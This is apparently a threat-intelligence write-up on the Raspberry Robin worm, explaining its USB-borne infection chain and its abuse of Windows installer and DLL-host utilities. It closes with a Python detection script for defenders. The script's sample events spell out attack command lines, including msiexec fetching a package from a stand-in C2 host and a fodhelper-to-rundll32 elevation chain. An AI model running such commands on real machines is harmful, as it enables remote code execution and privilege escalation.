Malware with worm-like capabilities is being used in attack campaigns affecting Windows systems. The threat and its associated cluster of activity have been tracked as Raspberry Robin and the 'QNAP worm' by cybersecurity researchers. According to their reports, the Raspberry Robin operation was first noticed in September 2021, but most of the activity took place in and after January 2022. Victims of the threat have been identified as companies operating in the technology and manufacturing sectors, but there could potentially be others as well. It should be noted that, so far, the goals of the threat actors have not been confirmed.
Exploiting Legitimate Windows Tools
Raspberry Robin's infection chain begins with infected removable drives such as USB devices. These drives carry the Raspberry Robin worm as a shortcut (.lnk) file disguised as a legitimate folder. The threat activates once the infected drive is connected to the computer. It takes advantage of cmd.exe to read and then execute a file found on the infected external drive. The researchers have found that this command is consistent across different Raspberry Robin detections, so it can be used as an indicator of the malicious activity carried out by the worm.
As part of its actions, the malware makes extensive use of legitimate Windows utilities. It abuses msiexec.exe (Microsoft Standard Installer) to fetch and execute a malicious DLL file, alongside other legitimate installer packages. The DLL file is believed to have persistence-related functionality and is retrieved from a Command-and-Control (C2, C&C) domain, likely hosted on compromised QNAP devices. The outbound C2 activity attributed to Raspberry Robin has also been observed using the Windows processes regsvr32.exe, rundll32.exe and dllhost.exe. The external network connection attempts were aimed at IP addresses of TOR nodes.
Raspberry Robin also uses msiexec.exe to launch another legitimate Windows utility, fodhelper.exe. The threat relies on it to spawn rundll32.exe and initiate a malicious command. The threat actor chose fodhelper.exe because it can launch processes with elevated administrator privileges without triggering a User Account Control (UAC) prompt.
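The behaviours described above (cmd.exe executing content from a removable drive, msiexec.exe pulling a package from a remote URL, msiexec.exe launching fodhelper.exe, fodhelper.exe spawning rundll32.exe, and regsvr32.exe/rundll32.exe/dllhost.exe making outbound connections) are each detectable from ordinary process-creation and network telemetry. The following Python is an added illustration, not code from the original report or from any vendor it cites: it runs a small set of rules over constructed process events. The event schema, the sample events, the drive-letter heuristic (treating any drive other than C: as possibly removable) and the example addresses are all assumptions made for the demonstration.

```python
"""Flag Raspberry Robin-style living-off-the-land process chains in process telemetry (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field


@dataclass
class ProcessEvent:
    """Minimal process-creation record; field names are an assumption, not a real product schema."""
    pid: int
    parent_image: str                  # full path of the parent process image
    image: str                         # full path of the created process image
    command_line: str
    remote_addresses: list[str] = field(default_factory=list)  # outbound connections seen for this pid


def _name(path: str) -> str:
    """Return the lower-cased file name of a Windows path (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Assumption for the demo: drive letters other than C: are treated as possibly removable.
REMOVABLE_PATH = re.compile(r"\b[d-z]:\\", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# System binaries the report names as carriers of outbound C2 traffic.
LOLBIN_NET = {"regsvr32.exe", "rundll32.exe", "dllhost.exe"}


def detect(event: ProcessEvent) -> list[str]:
    """Return a list of human-readable findings for one event (empty list when nothing matches)."""
    findings: list[str] = []
    image, parent, cmd = _name(event.image), _name(event.parent_image), event.command_line

    # Stage 1: cmd.exe reading/executing a file that lives on a non-system (possibly removable) drive.
    if image == "cmd.exe" and REMOVABLE_PATH.search(cmd):
        findings.append("cmd.exe executing content from a non-system drive")

    # Stage 2: msiexec.exe told to install a package from a remote URL instead of a local file.
    if image == "msiexec.exe" and REMOTE_URL.search(cmd):
        findings.append("msiexec.exe installing a package from a remote URL")

    # Stage 3: msiexec.exe launching fodhelper.exe (elevation without a UAC prompt).
    if image == "fodhelper.exe" and parent == "msiexec.exe":
        findings.append("msiexec.exe launched fodhelper.exe (elevation without UAC prompt)")

    # Stage 4: fodhelper.exe spawning rundll32.exe.
    if image == "rundll32.exe" and parent == "fodhelper.exe":
        findings.append("fodhelper.exe spawned rundll32.exe")

    # Stage 5: system DLL hosts making outbound connections.
    if image in LOLBIN_NET and event.remote_addresses:
        findings.append(f"{image} made outbound connections: {', '.join(event.remote_addresses)}")

    return findings


def scan(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Map pid -> findings for every event that produced at least one finding."""
    return {e.pid: found for e in events if (found := detect(e))}


# Constructed sample telemetry. Paths, the package URL and the address are placeholders,
# not real Raspberry Robin artefacts (203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS = [
    ProcessEvent(100, r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 r'"C:\Windows\System32\cmd.exe" /c E:\update.cmd'),
    ProcessEvent(101, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
                 "msiexec.exe /q /i http://c2.example/package.msi"),
    ProcessEvent(102, r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\fodhelper.exe",
                 "fodhelper.exe"),
    ProcessEvent(103, r"C:\Windows\System32\fodhelper.exe", r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\ProgramData\update.dll,Main", ["203.0.113.7"]),
    # Benign activity that the rules must not flag.
    ProcessEvent(104, r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcessEvent(105, r"C:\Windows\System32\services.exe", r"C:\Windows\System32\msiexec.exe",
                 r"msiexec.exe /i C:\Installers\app.msi /qn"),
]


if __name__ == "__main__":
    for pid, found in scan(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(found))
```

Each rule is deliberately narrow and keyed to the parent/child relationship or command-line shape the report describes, so it can be ported to a SIEM query or Sysmon-based rule with little change; the drive-letter regex is the one piece a deployment should replace with the host's real removable-media inventory, since mapped network drives also use non-C: letters.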